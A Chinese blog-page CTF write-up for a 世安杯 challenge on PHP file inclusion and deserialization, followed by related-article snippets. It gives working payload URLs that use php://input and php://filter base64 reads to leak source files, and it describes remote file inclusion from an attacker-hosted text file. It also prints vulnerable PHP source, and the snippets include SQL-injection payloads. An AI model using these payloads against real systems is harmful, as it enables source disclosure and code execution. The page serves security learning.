ctf题php反序列化,[世安杯]一道关于php反序列化漏洞的题目

最新推荐文章于 2024-04-15 05:58:23 发布
最新推荐文章于 2024-04-15 05:58:23 发布
阅读量969 收藏
点赞数
文章标签: ctf题php反序列化

5be5e9aafdbe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

Paste_Image.png

没什么信息,因此ctrl+u查看源码:

5be5e9aafdbe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

Paste_Image.png

看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到

5be5e9aafdbe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

Paste_Image.png

查看原文

因此试一试:

5be5e9aafdbe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

Paste_Image.png

补充一种饶过方法:

由于本题:allow_url_include=On

因此可以包含一个远程文件,假设你的云服务IP地址为:xxx

则可以输入http://ctf1.shiyanbar.com/shian-du/?user=http://xxxx/a.txt

其中a.txt的内容为:the user is admin

接着使用文件包含查看index.php和class.php的源码

#url

http://ctf1.shiyanbar.com/shian-du/?user=php://input&file=php://filter/read=convert.base64-encode/resource=index.php

http://ctf1.shiyanbar.com/shian-du/?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php

#POST

the user is admin

用base64解码,得到

#index.php

$user = $_GET["user"];

$file = $_GET["file"];

$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){

echo "hello admin!
";

if(preg_match("/f1a9/",$file)){

exit();

}else{

include($file); //class.php

$pass = unserialize($pass);

echo $pass;

}

}else{

echo "you are not admin ! ";

}

?>

大漠荒城史己
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞详解-CTF
一道CTF学习PHP反序列化漏洞-附件资源
03-02
一道CTF学习PHP反序列化漏洞-附件资源
BWVS-PHP伪协议
baynk的博客
11-26 882
0x00 前言 这个也算文件包含漏洞的一部分吧,刚刚好整理了下,就当漏洞复现了。 //php支持的伪协议 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — ...
ctf中的一道反序列化
weixin_40709439的博客
09-27 5248
早就想写了,今天刚好遇到一道反序列化就记录一下 自己在本地搭的,源码如下: index1.php <?php error_reporting(E_ALL & ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&...
fastjson反序列化漏洞,BAT大厂最爱问的网络安全核心面试百详细解析
最新发布
Python毕设源码程序王哥
04-15 611
​ 具体格式不变,同样是普通的fastjson格式的payload,但是里面引用的连接需要进行修改,同时,需要在hrader头中加入cmd: ifconfig等等命令。​ 在大部分情况下,可能没有做到如上面两种试验里这么顺利,遇到最多的问就是class文件不读取或者读取了不执行,可以直接利用工具,进行一个帮助的回显。项目,启动一个RMI服务器,监听9999端口,并使其加载编译好的类文件TouchFile.class。编译成功后会多出一个target文件夹,其中便有我们需要的jar包。
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
php反序列化漏洞原理,PHP反序列化原理及漏洞解析
weixin_29057237的博客
03-17 501
什么是PHP序列化PHP序列化与反序列化的过程一个反序列化漏洞的例子CVE-2016-7124一. 什么是PHP序列化与反序列化1. PHP序列化PHP序列化是指把变量转化成可保存或传输的字符串的过程,PHP序列化函数有serialize、json_encode。以下例子可以实现PHP序列化12345678910111213...
Bugku——welcome to bugkuctf一道练习php://filter和php://input的好
csu_vc的博客
10-28 9347
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
总之,PHP反序列化漏洞是安全性的一个重要关注点,需要开发者在设计和实现时考虑到潜在的风险,并采取适当的防御措施,比如避免使用`unserialize()`,或者在反序列化前对输入数据进行严格的验证和过滤。对于安全研究...
bugku-welcome to bugkuctfPHP伪协议&PHP反序列化综合运用)
烟敛寒林的博客
04-26 1248
1.通过php://input对变量输入内容,让file_get_contents能够读取变量的内容 2.通过php://filter/read=convert.base64-encode/resource=xxx.php得到其他PHP文件的源代码 3.通过反序列化,对echo的魔术方法__tostring()里面的参数进行赋值 题目地址:http://123.206.87.240...
php反序列化ctf,代码审计| CTF 中的反序列化
weixin_28990495的博客
03-21 527
0x00 序列化和反序列化简单的理解:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。序列化的对象可以是class也可以是Array,string等其他对象。0x01 对象序列化和反序列化的功能作用1. 对象序列化的功能作用概念:对象是在内存中存储的数据类型,寿命通常随着生成该...
文件包含函数
qq_70851535的博客
05-21 1218
将代码传入文件,从而直接执行文件中的代码通常文件包含漏洞产生于文件包含函数LFI:Local File Inclusion,本地文件包含漏洞,大部分情况下遇到的文件包含漏洞都是LFIRFI:Remote File Inclusion,远程文件包含漏洞(默认为On) ,规定是否允许从远程服务器或者网站检索数据(php5.2之后默认为Off) ,规定是否允许远程文件。
ctfphp反序列化,从一道CTF中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1755
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例来了解何为php反序列,以及php伪协议。原:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
bugkuCTF-练习平台
qq_36676979的博客
03-08 5184
web 1.web2 这查看源代码即可,火狐浏览器f12,查看器。 2.计算器 f12查看器,找到下面这行: <input type="text" class="input" maxlength="1"> 将maxlength改成位数比结果的的数,就可以输入了。 3.web基础$_GET 这个确实是基础,在get请求时,传入参数形式是在url后面加 ?参数=值。多个参数用 ?参...
BugkuCTF(web wp)
Xi4or0uji
08-25 4213
web2 源码就有flag 文件上传测试 服务器挂了兼忘了当初怎么做了(捂脸 计算器 这是要你计算一个数学公式的答案,但是发现只能输一个数字,改下maxlength,然后就能输入就有flag了 web基础$_GET 这其实考get方法传参,get方法发个flag,payload:?what=flag web基础$_POST post方法传参 矛盾 这要传一个num,...
CTF-file_get_contents()
mr__sheng的博客
09-11 254
calc.php?%20num=1;
ctf打卡第7天
jie_a的博客
06-18 214
打开网页,查看源代码是这样的 首先判断是否存在一个$user,并且读取文件===the user is admin 我们可以用php伪协议读取,他就会完整的等于文件内容 php://input 是个可以访问请求的原始数据的只读流. 这不对劲呢,等会再说 ...
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5555
[RCTF2015]EasySQL 这道没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
PHP反序列化漏洞 ctfhub
07-28
CTFHub中,可能会涉及到PHP反序列化漏洞作为一个题目或挑战,参与者需要通过利用该漏洞来获取目标系统的控制权或敏感信息。 为了防止PHP反序列化漏洞,开发人员应该采取以下几个措施: 1. 验证和过滤用户输入:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值